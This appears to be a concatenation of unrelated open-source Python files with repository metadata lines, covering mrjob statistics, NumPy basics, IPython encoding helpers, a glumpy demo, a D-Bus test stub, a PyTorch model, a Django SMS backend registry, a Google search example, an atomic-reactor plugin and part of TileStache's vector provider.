        # y^0, y^1, y^2 - session count, purchases, squared purchases
        yield (account_id, 'conversion rate'), (1, purchased, purchased)  # purchased is 0/1, so purchased ** 2 == purchased
        # y^0, y^1, y^2 - session count, sum of session times, sum of squared session times
        yield (account_id, 'average session length'), (1, session_duration, session_duration ** 2)
def reducer(self, metric, metric_values):
# for metric, yield [sum(y^0), sum(y^1), sum(y^2)]
yield metric, reduce(lambda x, y: map(sum, zip(x, y)), metric_values)
if __name__ == '__main__':
MRStatistics.run()
| jepatti/mrjob_recipes | statistic_rollup/statistic_summarize.py | Python | bsd-3-clause | 920 |
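A hedged follow-up sketch showing how the reducer's [n, sum_y, sum_y2] rollup
yields a mean and variance downstream; summarize() is illustrative and not
part of the job above:

def summarize(n, sum_y, sum_y2):
    mean = sum_y / float(n)
    variance = sum_y2 / float(n) - mean ** 2  # E[y^2] - E[y]^2
    return mean, variance

assert summarize(4, 8, 20) == (2.0, 1.0)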
import numpy as np
print '*******numpy array***********'
randArray = np.random.rand(4,4)  # 4x4 array of uniform random samples
randMat = np.mat(randArray)  # view the array as a matrix
irandMat = randMat.I  # .I gives the matrix inverse
a1=np.array(range(10,30,5))
a11=a1.reshape((2,2))
a111 = np.arange(12).reshape(3,4)
a2=np.linspace(0,2,10)
b=np.zeros((3,4))
c=np.ones((2,3,4),dtype='int16')
d=np.empty((2,3))
print a1,a11,a2,b,c,d
A1=np.arange(12)
print A1
A1.shape=(3,4) # in-place reshape, equivalent to A1 = A1.reshape(3,4)
M=np.mat(A1.copy())
#Vector Stacking
x = np.arange(0,10,2) # x=([0,2,4,6,8])
y = np.arange(5) # y=([0,1,2,3,4])
m = np.vstack([x,y]) # m=([[0,2,4,6,8],
# [0,1,2,3,4]])
xy = np.hstack([x,y]) # xy =([0,2,4,6,8,0,1,2,3,4])
A=np.array([[1,1],[0,1]])
B=np.array([[2,0],[3,4]])
C=A*B # elementwise product
D=np.dot(A,B) # matrix product
a = np.random.random((2,3))
asum=a.sum()
amin=a.min()
amax=a.max()
print a,asum,amin,amax
print '*******numpy matrix***********'
A=np.matrix('1.0,2.0;3.0,4.0')
AT=A.T
B=A*AT
print A,AT,B
| likeucode/PythonLearning | sciComputing/matrixComputing.py | Python | bsd-3-clause | 1067 |
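A short self-contained check of the matrix-inverse step near the top of the
script above (same NumPy vintage; the assertion is mine):

import numpy as np

m = np.mat(np.random.rand(4, 4))
# a matrix multiplied by its inverse should be numerically the identity
assert np.allclose(m * m.I, np.eye(4))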
# coding: utf-8
"""
Utilities for dealing with text encodings
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2012 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import sys
import locale
import warnings
# to deal with the possibility of sys.std* not being a stream at all
def get_stream_enc(stream, default=None):
"""Return the given stream's encoding or a default.
There are cases where ``sys.std*`` might not actually be a stream, so
check for the encoding attribute prior to returning it, and return
a default if it doesn't exist or evaluates as False. ``default``
is None if not provided.
"""
if not hasattr(stream, 'encoding') or not stream.encoding:
return default
else:
return stream.encoding
# Less conservative replacement for sys.getdefaultencoding, that will try
# to match the environment.
# Defined here as central function, so if we find better choices, we
# won't need to make changes all over IPython.
def getdefaultencoding():
"""Return IPython's guess for the default encoding for bytes as text.
Asks for stdin.encoding first, to match the calling Terminal, but that
is often None for subprocesses. Fall back on locale.getpreferredencoding()
which should be a sensible platform default (that respects LANG environment),
and finally to sys.getdefaultencoding() which is the most conservative option,
and usually ASCII.
"""
enc = get_stream_enc(sys.stdin)
if not enc or enc=='ascii':
try:
# There are reports of getpreferredencoding raising errors
# in some cases, which may well be fixed, but let's be conservative here.
enc = locale.getpreferredencoding()
except Exception:
pass
enc = enc or sys.getdefaultencoding()
# On windows `cp0` can be returned to indicate that there is no code page.
# Since cp0 is an invalid encoding return instead cp1252 which is the
# Western European default.
if enc == 'cp0':
warnings.warn(
"Invalid code page cp0 detected - using cp1252 instead."
"If cp1252 is incorrect please ensure a valid code page "
"is defined for the process.", RuntimeWarning)
return 'cp1252'
return enc
DEFAULT_ENCODING = getdefaultencoding()
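# Minimal usage sketch (illustrative; kept as a comment so that importing this
# module stays side-effect free):
#
#   from IPython.utils.encoding import get_stream_enc, DEFAULT_ENCODING
#   enc = get_stream_enc(sys.stdout, DEFAULT_ENCODING)
#   text = b'caf\xc3\xa9'.decode(enc, 'replace')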
| marcoantoniooliveira/labweb | oscar/lib/python2.7/site-packages/IPython/utils/encoding.py | Python | bsd-3-clause | 2,724 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Nicolas P. Rougier. All Rights Reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
import numpy as np
from glumpy import app, gl, gloo
from glumpy.transforms import Position, OrthographicProjection, PanZoom
# Create window
window = app.Window(width=1024, height=512)
quad_vertex = """
attribute vec2 position;
void main (void) { gl_Position = vec4(position,0,1); }
"""
quad_fragment = """
void main(void) { gl_FragColor = vec4(1,1,1,1.0/128.0); }
"""
line_vertex = """
attribute vec2 position;
void main (void) { gl_Position = vec4(position,0,1); }
"""
line_fragment = """
void main(void) { gl_FragColor = vec4(0,0,0,1); }
"""
@window.event
def on_draw(dt):
global time
time += np.random.uniform(0,dt)
quad.draw(gl.GL_TRIANGLE_STRIP)
line.draw(gl.GL_LINE_STRIP)
window.swap()
quad.draw(gl.GL_TRIANGLE_STRIP)
line.draw(gl.GL_LINE_STRIP)
X = line["position"][:,0]
scale = np.random.uniform(0.1,0.5)
frequency = np.random.uniform(3,5)
noise = 0.01*np.random.uniform(-1,+1,n)
line["position"][:,1] = scale*np.cos(frequency*X + time) + noise
@window.event
def on_init():
gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_DST_ALPHA)
@window.event
def on_resize(width, height):
window.clear()
window.swap()
window.clear()
n = 512
line = gloo.Program(line_vertex, line_fragment, count=n)
line["position"][:,0] = np.linspace(-1,1,n)
line["position"][:,1] = np.random.uniform(-0.5,0.5,n)
quad = gloo.Program(quad_vertex, quad_fragment, count=4)
quad['position'] = [(-1,-1), (-1,+1), (+1,-1), (+1,+1)]
time = 0
app.run()
| duyuan11/glumpy | examples/gloo-trace.py | Python | bsd-3-clause | 1,814 |
#!/usr/bin/env python
import os
import time
from threading import Timer
from pprint import pprint
from datetime import datetime
import gobject
import glob
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
DBusGMainLoop(set_as_default=True)
gobject.threads_init() # Multithreaded python programs must call this before using threads.
bus = dbus.SessionBus()
loop = gobject.MainLoop()
"""
This is a shared interface between two objects.
"""
InterfaceA = "nl.ict.AABUnitTest.A"
"""
Objects who have the InterfaceOnBulkTransfer interface must implement
onBulkRequest(String fifoToPayload, String fifoToAndroid, String requestedBulkData)
"""
InterfaceOnBulkTransfer = "nl.ict.aapbridge.bulk"
"""
bus-name : nl.ict.AABUnitTest
objectpaths: /nl/ict/AABUnitTestB
/nl/ict/AABUnitTestC
/nl/ict/AABUnitTest/bulk/echo1
/nl/ict/AABUnitTest/bulk/echo2
interfaces : nl.ict.AABUnitTest.B
nl.ict.AABUnitTest.Methods
nl.ict.AABUnitTest.Signals
nl.ict.aapbridge.bulk
"""
class AABUnitTestB(dbus.service.Object):
InterfaceB = "nl.ict.AABUnitTest.Methods"
def __init__(self, object_path, bus_name):
dbus.service.Object.__init__(self, bus_name, object_path)
@dbus.service.method(InterfaceA, in_signature='', out_signature='')
def LocalEcho(self):
print(str(datetime.now()) + " Local echo from AABUnitTestB")
@dbus.service.method(InterfaceB, in_signature='y', out_signature='y')
def ExpectingByte(self, val):
print(str(datetime.now()) + " Expecting: y Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='b', out_signature='b')
def ExpectingBoolean(self, val):
print(str(datetime.now()) + " Expecting: b Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='n', out_signature='n')
def ExpectingInt16(self, val):
print(str(datetime.now()) + " Expecting: n Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='q', out_signature='q')
def ExpectingUint16(self, val):
print(str(datetime.now()) + " Expecting: q Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='i', out_signature='i')
def ExpectingInt32(self, val):
print(str(datetime.now()) + " Expecting: i Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='u', out_signature='u')
def ExpectingUint32(self, val):
print(str(datetime.now()) + " Expecting: u Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='x', out_signature='x')
def ExpectingInt64(self, val):
print(str(datetime.now()) + " Expecting: x Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='t', out_signature='t')
def ExpectingUint64(self, val):
print(str(datetime.now()) + " Expecting: t Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='d', out_signature='d')
def ExpectingDouble(self, val):
print(str(datetime.now()) + " Expecting: d Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='s', out_signature='s')
def ExpectingString(self, val):
print(str(datetime.now()) + " Expecting: s Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='o', out_signature='o')
def ExpectingObjectPath(self, val):
print(str(datetime.now()) + " Expecting: o Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='g', out_signature='g')
def ExpectingSignature(self, val):
print(str(datetime.now()) + " Expecting: g Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='ai', out_signature='ai')
def ExpectingArrayInt32(self, val):
print(str(datetime.now()) + " Expecting: ai Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='(isi)', out_signature='(isi)')
def ExpectingStruct1(self, val):
print(str(datetime.now()) + " Expecting: (isi) Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='a{si}', out_signature='a{si}')
def ExpectingDict(self, val):
print(str(datetime.now()) + " Expecting: a{si} Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='h', out_signature='h')
def ExpectingFd(self, val):
print(str(datetime.now()) + " Expecting: h Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='ssss', out_signature='ssss')
def ExpectingMultiString(self, uno, duo, tres, dos ):
print(str(datetime.now()) + " Expecting: ssss Got: "+repr( (uno, duo, tres, dos) ))
return (uno, duo, tres, dos);
@dbus.service.method(InterfaceB, in_signature='yyiyx', out_signature='yyiyx')
def ExpectingComplex1(self, byte1,byte2,i,byte3,x ):
print(str(datetime.now()) + " Expecting: yyiyx Got: "+repr( (byte1,byte2,i,byte3,x) ))
return (byte1,byte2,i,byte3,x);
@dbus.service.method(InterfaceB, in_signature='', out_signature='')
def ExceptionThrower1(self):
        raise NotImplementedError, "I didn't have time to implement this function"
@dbus.service.method(InterfaceB, in_signature='', out_signature='')
def ExceptionThrower2(self):
raise TypeError, "Yeah well... no."
@dbus.service.method(InterfaceB, in_signature='', out_signature='')
def ReturnsNothing(self):
pass
class AABUnitTestC(dbus.service.Object):
InterfaceC = "nl.ict.AABUnitTest.Signals"
def __init__(self, object_path, bus_name):
dbus.service.Object.__init__(self, bus_name, object_path)
@dbus.service.method(InterfaceA, in_signature='', out_signature='')
def LocalEcho(self):
print(str(datetime.now()) + " Local echo from AABUnitTestC")
@dbus.service.signal(InterfaceC, signature='y')
def Byte(self,val):
pass
@dbus.service.signal(InterfaceC, signature='b')
def Boolean(self,val):
pass
@dbus.service.signal(InterfaceC, signature='n')
def Int16(self,val):
pass
@dbus.service.signal(InterfaceC, signature='q')
def Uint32(self,val):
pass
@dbus.service.signal(InterfaceC, signature='i')
def Int32(self,val):
pass
@dbus.service.signal(InterfaceC, signature='d')
def Double(self,val):
pass
@dbus.service.signal(InterfaceC, signature='s')
def String(self,val):
pass
@dbus.service.signal(InterfaceC, signature='sd')
def Sensor(self,name,value):
pass
@dbus.service.signal(InterfaceC, signature='ysdyi')
def Complex1(self,var1,var2,var3,var4,var5):
pass
def Emit(self):
self.Byte(2)
time.sleep(5)
self.Boolean(True)
time.sleep(5)
self.Int32(3)
time.sleep(5)
self.String("The only real advantage to punk music is that nobody can whistle it.")
time.sleep(5)
self.Double(5.5)
time.sleep(5)
self.Sensor("humidity1",9.923)
time.sleep(5)
self.Complex1(8,"Never do today what you can put off until tomorrow.",45.00000003,9,9084)
@dbus.service.method(InterfaceC, in_signature='', out_signature='')
def StartEmittingSignals(self):
print("Starting to emit signals")
emitter = Timer(5, AABUnitTestC.Emit, [self])
emitter.start()
def onEchoIOReady(source, cb_condition, fifoToPayload, fifoToAndroid):
    if cb_condition == gobject.IO_HUP:
fifoToAndroid.close()
return False
try:
fifoToAndroid.write(os.read(fifoToPayload, 5000))
fifoToAndroid.flush()
except:
fifoToAndroid.close()
return False
return True
def onBulkEchoRequest(fifoToPayloadPath, fifoToAndroidPath, requestedBulkData):
print("Opening fifo's")
fifoToPayload = os.open(fifoToPayloadPath, os.O_RDONLY )
fifoToAndroid = open(fifoToAndroidPath, 'w')
print("Fifo's are open")
gobject.io_add_watch(fifoToPayload, gobject.IO_IN | gobject.IO_HUP, onEchoIOReady, fifoToPayload, fifoToAndroid)
class BulkTransferEcho(dbus.service.Object):
def __init__(self, object_path, bus_name):
dbus.service.Object.__init__(self, bus_name, object_path)
@dbus.service.method(InterfaceOnBulkTransfer, in_signature='sss', out_signature='')
def onBulkRequest(self, fifoToPayloadPath, fifoToAndroidPath, requestedBulkData):
print("onBulkRequest: "+fifoToPayloadPath+" "+fifoToAndroidPath+" "+requestedBulkData)
gobject.idle_add(onBulkEchoRequest, fifoToPayloadPath, fifoToAndroidPath, requestedBulkData)
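# Hedged client-side sketch (illustrative; would be run from a separate
# process while this stub is serving the session bus):
#
#   import dbus
#   remote = dbus.SessionBus().get_object('nl.ict.AABUnitTest', '/nl/ict/AABUnitTest/B')
#   methods = dbus.Interface(remote, dbus_interface='nl.ict.AABUnitTest.Methods')
#   print(methods.ExpectingString('hello'))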
bus_name = dbus.service.BusName('nl.ict.AABUnitTest', bus)
serviceB = AABUnitTestB('/nl/ict/AABUnitTest/B',bus_name)
serviceC = AABUnitTestC('/nl/ict/AABUnitTest/C',bus_name)
bulkEcho1 = BulkTransferEcho('/nl/ict/AABUnitTest/bulk/echo1',bus_name)
bulkEcho2 = BulkTransferEcho('/nl/ict/AABUnitTest/bulk/echo2',bus_name)
print("Starting event loop")
loop.run()
| Benny-/android-accessory-protocol-bridge | Accessory/Payloads/testStub.py | Python | bsd-3-clause | 9,363 |
"""
Model definition for weakly supervised object localization with pytorch
=====================================================================
*Author*: Yu Zhang, Northwestern Polytechnical University
"""
import torch
import torch.nn as nn
import numpy as np
import os
# import shutil
import torchvision.models as models
from spn.modules import SoftProposal
import spn_codes.spatialpooling as spatialpooling
class WSL(nn.Module):
def __init__(self, num_classes=20, num_maps=1024):
super(WSL, self).__init__()
model = models.vgg16(pretrained=True)
num_features = model.features[28].out_channels
self.features = nn.Sequential(*list(model.features.children())[:-1])
# self.spatial_pooling = pooling
self.addconv = nn.Conv2d(num_features, num_maps, kernel_size=3,
stride=1, padding=1, groups=2, bias=True)
self.maps = nn.ReLU()
self.sp = SoftProposal()
self.sum = spatialpooling.SpatialSumOverMap()
# classification layer
self.classifier = nn.Sequential(
nn.Dropout(0.5),
nn.Linear(num_maps, num_classes)
)
def forward(self, x):
x = self.features(x)
x = self.addconv(x)
x = self.maps(x)
sp = self.sp(x)
x = self.sum(sp)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
def get_att_map(self, x):
x = self.features(x)
x = self.addconv(x)
x = self.maps(x)
sp = self.sp(x)
x = self.sum(sp)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x, sp
# def load_pretrained_vgg(self, fname):
# vgg_param = np.load(fname, encoding='latin1').item() # vgg16
# net_param = self.state_dict()
# para_keys = list(net_param.keys())
# for idx in range(26):
# name = para_keys[idx]
# val = net_param[name]
# i, j = int(name[4]), int(name[6]) + 1
# ptype = 'weights' if name[-1] == 't' else 'biases'
# key = 'conv{}_{}'.format(i, j)
# param = torch.from_numpy(vgg_param[key][ptype])
# if ptype == 'weights':
# param = param.permute(3, 2, 0, 1)
# val.copy_(param)
def load_checkpoint(self, fname):
if os.path.isfile(fname):
print('loading checkpoint {}'.format(fname))
checkpt = torch.load(fname)
self.load_state_dict(checkpt['state_dict'])
else:
print('{} not found'.format(fname))
class ConvReLU(nn.Module):
def __init__(self, in_ch, out_ch, kernel_sz, stride=1, relu=True, pd=True, bn=False):
super(ConvReLU, self).__init__()
padding = int((kernel_sz - 1) / 2) if pd else 0 # same spatial size by default
self.conv = nn.Conv2d(in_ch, out_ch, kernel_sz, stride, padding=padding)
self.bn = nn.BatchNorm2d(out_ch, eps=0.001, momentum=0, affine=True) if bn else None
self.relu = nn.ReLU(inplace=True) if relu else None
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
if self.relu is not None:
x = self.relu(x)
return x
class ClsConv(nn.Module):
"""docstring for ClsConv"""
def __init__(self, in_ch=512, bn=False):
super(ClsConv, self).__init__()
self.conv_layers = nn.Sequential(ConvReLU(in_ch, 256, 3, pd=True, bn=bn),
ConvReLU(256, 128, 3, pd=True, bn=bn),
ConvReLU(128, 64, 3, pd=True, bn=bn),
nn.Conv2d(64, 1, kernel_size=3, stride=1, padding=1))
def forward(self, feature):
return self.conv_layers(feature)
def save_checkpoint(state, filename='checkpoint.pth.tar'):
torch.save(state, filename)
def load_pretrained(model, fname, optimizer=None):
"""
resume training from previous checkpoint
:param fname: filename(with path) of checkpoint file
:return: model, optimizer, checkpoint epoch for train or only model for test
"""
if os.path.isfile(fname):
print("=> loading checkpoint '{}'".format(fname))
checkpoint = torch.load(fname)
model.load_state_dict(checkpoint['state_dict'])
if optimizer is not None:
optimizer.load_state_dict(checkpoint['optimizer'])
return model, optimizer, checkpoint['epoch']
else:
return model
else:
raise Exception("=> no checkpoint found at '{}'".format(fname))
| zhangyuygss/WSL | model/model.py | Python | bsd-3-clause | 4,628 |
from django.conf import settings
from django.core.urlresolvers import get_mod_func
REGISTRY = {}
backends = getattr(settings, 'SMSGATEWAY_BACKENDS', ())
for entry in backends:
module_name, class_name = get_mod_func(entry)
backend_class = getattr(__import__(module_name, {}, {}, ['']), class_name)
instance = backend_class()
REGISTRY[instance.get_slug()] = instance
def get_backend(slug):
return REGISTRY.get(slug, None)
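# Hedged usage sketch: given a hypothetical settings entry such as
#
#   SMSGATEWAY_BACKENDS = ('myproject.sms.DebugBackend',)
#
# the REGISTRY above is filled at import time, keyed by each backend's slug,
# and a backend instance is then fetched with:
#
#   backend = get_backend('debug')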
| peterayeni/django-smsgateway | smsgateway/backends/__init__.py | Python | bsd-3-clause | 444 |
import os, sys; sys.path.insert(0, os.path.join("..", ".."))
from pattern.web import Google, plaintext
from pattern.web import SEARCH
# The web module has a SearchEngine class with a search() method
# that yields a list of Result objects.
# Each Result has url, title, description, language, author and date and properties.
# Subclasses of SearchEngine include:
# Google, Yahoo, Bing, Twitter, Facebook, Wikipedia, Flickr.
# This example retrieves results from Google based on a given query.
# The Google search engine can handle SEARCH type searches.
# Google's "Custom Search API" is a paid service.
# The web module uses a test account with 100 free queries per day, shared with all users.
# If the limit is exceeded, SearchEngineLimitError is raised.
# You can obtain your own license key at: https://code.google.com/apis/console/
# Activate "Custom Search API" under "Services" and get the key under "API Access".
# Then use Google(license=[YOUR_KEY]).search().
# This will give you 100 personal free queries, or 5$ per 1000 queries.
engine = Google(license=None, language="en")
# Veale & Hao's method for finding simile using Google's wildcard (*) support.
# http://afflatus.ucd.ie/Papers/LearningFigurative_CogSci07.pdf
# This will match results such as "as light as a feather", "as cute as a cupcake", etc.
q = "as * as a *"
# Google is very fast but you can only get up to 100 (10x10) results per query.
for i in range(1,2):
for result in engine.search(q, start=i, count=10, type=SEARCH):
print plaintext(result.description) # plaintext() removes HTML formatting.
print result.url
print result.date
        print
| piskvorky/pattern | examples/01-web/01-google.py | Python | bsd-3-clause | 1,660 |
"""
Copyright (c) 2019 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import unicode_literals, absolute_import
from atomic_reactor.constants import PLUGIN_PUSH_FLOATING_TAGS_KEY, PLUGIN_GROUP_MANIFESTS_KEY
from atomic_reactor.utils.manifest import ManifestUtil
from atomic_reactor.plugin import ExitPlugin
from atomic_reactor.util import get_floating_images, get_unique_images
class PushFloatingTagsPlugin(ExitPlugin):
"""
Push floating tags to registry
"""
key = PLUGIN_PUSH_FLOATING_TAGS_KEY
is_allowed_to_fail = False
def __init__(self, tasker, workflow):
"""
constructor
:param tasker: DockerTasker instance
:param workflow: DockerBuildWorkflow instance
"""
super(PushFloatingTagsPlugin, self).__init__(tasker, workflow)
self.manifest_util = ManifestUtil(workflow, None, self.log)
def add_floating_tags(self, session, manifest_list_data, floating_images):
list_type = manifest_list_data.get("media_type")
manifest = manifest_list_data.get("manifest")
manifest_digest = manifest_list_data.get("manifest_digest")
for image in floating_images:
target_repo = image.to_str(registry=False, tag=False)
# We have to call store_manifest_in_repository directly for each
# referenced manifest, since each one should be a new tag that requires uploading
# the manifest again
self.log.debug("storing %s as %s", target_repo, image.tag)
self.manifest_util.store_manifest_in_repository(session, manifest, list_type,
target_repo, target_repo, ref=image.tag)
# And store the manifest list in the push_conf
push_conf_registry = self.workflow.push_conf.add_docker_registry(session.registry,
insecure=session.insecure)
for image in floating_images:
push_conf_registry.digests[image.tag] = manifest_digest
registry_image = get_unique_images(self.workflow)[0]
return registry_image.get_repo(explicit_namespace=False), manifest_digest
def run(self):
"""
Run the plugin.
"""
if self.workflow.build_process_failed:
self.log.info('Build failed, skipping %s', PLUGIN_PUSH_FLOATING_TAGS_KEY)
return
floating_tags = get_floating_images(self.workflow)
if not floating_tags:
self.log.info('No floating images to tag, skipping %s', PLUGIN_PUSH_FLOATING_TAGS_KEY)
return
# can't run in the worker build
if not self.workflow.is_orchestrator_build():
self.log.warning('%s cannot be used by a worker builder', PLUGIN_PUSH_FLOATING_TAGS_KEY)
return
manifest_data = self.workflow.postbuild_results.get(PLUGIN_GROUP_MANIFESTS_KEY)
if not manifest_data or not manifest_data.get("manifest_digest"):
self.log.info('No manifest digest available, skipping %s',
PLUGIN_PUSH_FLOATING_TAGS_KEY)
return
digests = dict()
for registry in self.manifest_util.registries:
session = self.manifest_util.get_registry_session(registry)
repo, digest = self.add_floating_tags(session, manifest_data, floating_tags)
digests[repo] = digest
return digests
| projectatomic/atomic-reactor | atomic_reactor/plugins/exit_push_floating_tags.py | Python | bsd-3-clause | 3,577 |
""" Provider that returns vector representation of features in a data source.
This is a provider that does not return an image, but rather queries
a data source for raw features and replies with a vector representation
such as GeoJSON. For example, it's possible to retrieve data for
locations of OpenStreetMap points of interest or street centerlines
contained within a tile's boundary.
Many Polymaps (http://polymaps.org) examples use GeoJSON vector data tiles,
which can be effectively created using this provider.
Vector functionality is provided by OGR (http://www.gdal.org/ogr/).
Thank you, Frank Warmerdam.
Currently two serializations and three encodings are supported for a total
of six possible kinds of output with these tile name extensions:
GeoJSON (.geojson):
See http://geojson.org/geojson-spec.html
Arc GeoServices JSON (.arcjson):
See http://www.esri.com/library/whitepapers/pdfs/geoservices-rest-spec.pdf
GeoBSON (.geobson) and Arc GeoServices BSON (.arcbson):
BSON-encoded GeoJSON and Arc JSON, see http://bsonspec.org/#/specification
GeoAMF (.geoamf) and Arc GeoServices AMF (.arcamf):
AMF0-encoded GeoJSON and Arc JSON, see:
http://opensource.adobe.com/wiki/download/attachments/1114283/amf0_spec_121207.pdf
Possible future supported formats might include KML and others. Get in touch
via Github to suggest other formats: http://github.com/migurski/TileStache.
Common parameters:
driver:
String used to identify an OGR driver. Currently, "ESRI Shapefile",
"PostgreSQL", "MySQL", Oracle, Spatialite and "GeoJSON" are supported as
data source drivers, with "postgis" and "shapefile" accepted as synonyms.
Not case-sensitive.
OGR's complete list of potential formats can be found here:
http://www.gdal.org/ogr/ogr_formats.html. Feel free to get in touch via
Github to suggest new formats: http://github.com/migurski/TileStache.
parameters:
Dictionary of parameters for each driver.
PostgreSQL:
"dbname" parameter is required, with name of database.
"host", "user", and "password" are optional connection parameters.
One of "table" or "query" is required, with a table name in the first
case and a complete SQL query in the second.
Shapefile and GeoJSON:
"file" parameter is required, with filesystem path to data file.
properties:
Optional list or dictionary of case-sensitive output property names.
If omitted, all fields from the data source will be included in response.
If a list, treated as a whitelist of field names to include in response.
If a dictionary, treated as a whitelist and re-mapping of field names.
clipped:
Default is true.
Boolean flag for optionally clipping the output geometries to the
bounds of the enclosing tile, or the string value "padded" for clipping
to the bounds of the tile plus 5%. This results in incomplete geometries,
dramatically smaller file sizes, and improves performance and
compatibility with Polymaps (http://polymaps.org).
projected:
Default is false.
Boolean flag for optionally returning geometries in projected rather than
geographic coordinates. Typically this means EPSG:900913 a.k.a. spherical
mercator projection. Stylistically a poor fit for GeoJSON, but useful
when returning Arc GeoServices responses.
precision:
Default is 6.
Optional number of decimal places to use for floating point values.
spacing:
Optional number of tile pixels for spacing geometries in responses. Used
to cut down on the number of returned features by ensuring that only those
features at least this many pixels apart are returned. Order of features
in the data source matters: early features beat out later features.
verbose:
Default is false.
Boolean flag for optionally expanding output with additional whitespace
for readability. Results in larger but more readable GeoJSON responses.
id_property:
Default is None.
Sets the id of the geojson feature to the specified field of the data source.
This can be used, for example, to identify a unique key field for the feature.
Example TileStache provider configuration:
"vector-postgis-points":
{
"provider": {"name": "vector", "driver": "PostgreSQL",
"parameters": {"dbname": "geodata", "user": "geodata",
"table": "planet_osm_point"}}
}
"vector-postgis-lines":
{
"provider": {"name": "vector", "driver": "postgis",
"parameters": {"dbname": "geodata", "user": "geodata",
"table": "planet_osm_line"}}
}
"vector-shapefile-points":
{
"provider": {"name": "vector", "driver": "ESRI Shapefile",
"parameters": {"file": "oakland-uptown-point.shp"},
"properties": ["NAME", "HIGHWAY"]}
}
"vector-shapefile-lines":
{
"provider": {"name": "vector", "driver": "shapefile",
"parameters": {"file": "oakland-uptown-line.shp"},
"properties": {"NAME": "name", "HIGHWAY": "highway"}}
}
"vector-postgis-query":
{
"provider": {"name": "vector", "driver": "PostgreSQL",
"parameters": {"dbname": "geodata", "user": "geodata",
"query": "SELECT osm_id, name, highway, way FROM planet_osm_line WHERE SUBSTR(name, 1, 1) = '1'"}}
}
"vector-sf-streets":
{
"provider": {"name": "vector", "driver": "GeoJSON",
"parameters": {"file": "stclines.json"},
"properties": ["STREETNAME"]}
}
Caveats:
Your data source must have a valid defined projection, or OGR will not know
how to correctly filter and reproject it. Although response tiles are typically
in web (spherical) mercator projection, the actual vector content of responses
is unprojected back to plain WGS84 latitude and longitude.
If you are using PostGIS and spherical mercator a.k.a. SRID 900913,
you can save yourself a world of trouble by using this definition:
http://github.com/straup/postgis-tools/raw/master/spatial_ref_900913-8.3.sql
"""
from re import compile
from urlparse import urlparse, urljoin
try:
from json import JSONEncoder, loads as json_loads
except ImportError:
from simplejson import JSONEncoder, loads as json_loads
try:
from osgeo import ogr, osr
except ImportError:
# At least we'll be able to build the documentation.
pass
from TileStache.Core import KnownUnknown
from TileStache.Geography import getProjectionByName
from Arc import reserialize_to_arc, pyamf_classes
class VectorResponse:
""" Wrapper class for Vector response that makes it behave like a PIL.Image object.
TileStache.getTile() expects to be able to save one of these to a buffer.
Constructor arguments:
- content: Vector data to be serialized, typically a dictionary.
- verbose: Boolean flag to expand response for better legibility.
"""
def __init__(self, content, verbose, precision=6):
self.content = content
self.verbose = verbose
self.precision = precision
def save(self, out, format):
"""
"""
#
# Serialize
#
if format == 'WKT':
if 'wkt' in self.content['crs']:
out.write(self.content['crs']['wkt'])
else:
out.write(_sref_4326().ExportToWkt())
return
if format in ('GeoJSON', 'GeoBSON', 'GeoAMF'):
content = self.content
if 'wkt' in content['crs']:
content['crs'] = {'type': 'link', 'properties': {'href': '0.wkt', 'type': 'ogcwkt'}}
else:
del content['crs']
elif format in ('ArcJSON', 'ArcBSON', 'ArcAMF'):
content = reserialize_to_arc(self.content, format == 'ArcAMF')
else:
raise KnownUnknown('Vector response only saves .geojson, .arcjson, .geobson, .arcbson, .geoamf, .arcamf and .wkt tiles, not "%s"' % format)
#
# Encode
#
if format in ('GeoJSON', 'ArcJSON'):
indent = self.verbose and 2 or None
encoded = JSONEncoder(indent=indent).iterencode(content)
float_pat = compile(r'^-?\d+\.\d+$')
for atom in encoded:
if float_pat.match(atom):
out.write(('%%.%if' % self.precision) % float(atom))
else:
out.write(atom)
elif format in ('GeoBSON', 'ArcBSON'):
import bson
encoded = bson.dumps(content)
out.write(encoded)
elif format in ('GeoAMF', 'ArcAMF'):
import pyamf
for class_name in pyamf_classes.items():
pyamf.register_class(*class_name)
encoded = pyamf.encode(content, 0).read()
out.write(encoded)
def _sref_4326():
"""
"""
sref = osr.SpatialReference()
proj = getProjectionByName('WGS84')
sref.ImportFromProj4(proj.srs)
return sref
def _tile_perimeter(coord, projection, padded):
""" Get a tile's outer edge for a coordinate and a projection.
Returns a list of 17 (x, y) coordinates corresponding to a clockwise
circumambulation of a tile boundary in a given projection. Projection
is like those found in TileStache.Geography, used for tile output.
If padded argument is True, pad bbox by 5% on all sides.
"""
if padded:
ul = projection.coordinateProj(coord.left(0.05).up(0.05))
lr = projection.coordinateProj(coord.down(1.05).right(1.05))
else:
ul = projection.coordinateProj(coord)
lr = projection.coordinateProj(coord.right().down())
xmin, ymin, xmax, ymax = ul.x, ul.y, lr.x, lr.y
